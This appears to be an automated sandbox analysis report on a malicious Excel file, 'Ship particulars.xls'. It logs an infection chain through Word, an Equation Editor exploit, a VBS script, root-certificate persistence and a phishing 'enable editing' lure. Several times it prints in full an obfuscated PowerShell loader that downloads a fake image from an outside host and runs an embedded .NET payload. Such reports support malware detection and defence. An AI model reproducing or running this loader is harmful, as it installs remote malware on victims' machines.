Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Ship particulars.xls OLE: Microsoft Excel 2007+
Source: ~DF669CF6B4D81DE92B.TMP.0.dr OLE: Microsoft Excel 2007+
Source: ~DFA3F86C325C272D08.TMP.0.dr OLE: Microsoft Excel 2007+
Source: 92530000.0.dr OLE: Microsoft Excel 2007+
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sWel7.url
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\hop.fyi.url
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 770B0000 page execute and read and write
Source: Ship particulars.xls OLE indicator, VBA macros: true
Source: Ship particulars.xls Stream path 'MBD0026D145/\x1Ole' : http://hop.fyi/sWel7Oa~_q%Yw!G7j&F|ZJI}BrKgJ"&s+j1pL-ER|Lj#EFb<kHhdsd$;{aI@;/*cPe%"vstTh6cJbYmbO7DHAlcpX7qKKqrqxYaqxLewLAFBEdsLm8PNMPlG7cCAUmRGOO2ylgsQYSFVqScSTyFbrUgiNBHK7hzTJOzwb3PW3KYHww1hYRyxjl1NEAs1DopTZpESd6ODn7qx4UZPd1ej-T1.V=6P"&~^,
Source: ~DF669CF6B4D81DE92B.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFA3F86C325C272D08.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{45674ED6-0137-4508-99E9-56BDBC83CE0D}.tmp.3.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: classification engine Classification label: mal100.expl.evad.winXLS@7/34@13/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\92530000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7261.tmp
Source: Ship particulars.xls OLE indicator, Workbook stream: true
Source: 92530000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Ship particulars.xls ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: credssp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: ~DF669CF6B4D81DE92B.TMP.0.dr Initial sample: OLE indicators vbamacros = False
Source: Ship particulars.xls Initial sample: OLE indicators encrypted = True

Data Obfuscation

Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00214C5C push cs; ret 12_2_00214C62

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\hop.fyi\DavWWWRoot
Source: Office document LLM: Score: 8 Reasons: The screenshot contains a visually prominent button labeled 'Enable Editing' which is highlighted in yellow. The text in the screenshot creates a sense of urgency by stating 'contenido bloqueado, habilite la edición para ver el documento' and 'Content Locked. Please enable Editing and Content from the Yellow bar above to view locked content.' This type of message is commonly used in phishing attempts to trick users into enabling macros or other potentially harmful features. There is no clear impersonation of well-known brands, but the format and language used are typical of phishing attempts. The sense of urgency is directly connected to the prominent button, increasing the risk of the user being misled into enabling potentially harmful content.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: uh.uh.uhuhuh.uu.uh[1].doc.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: 4924813.doc.3.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_035B05A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
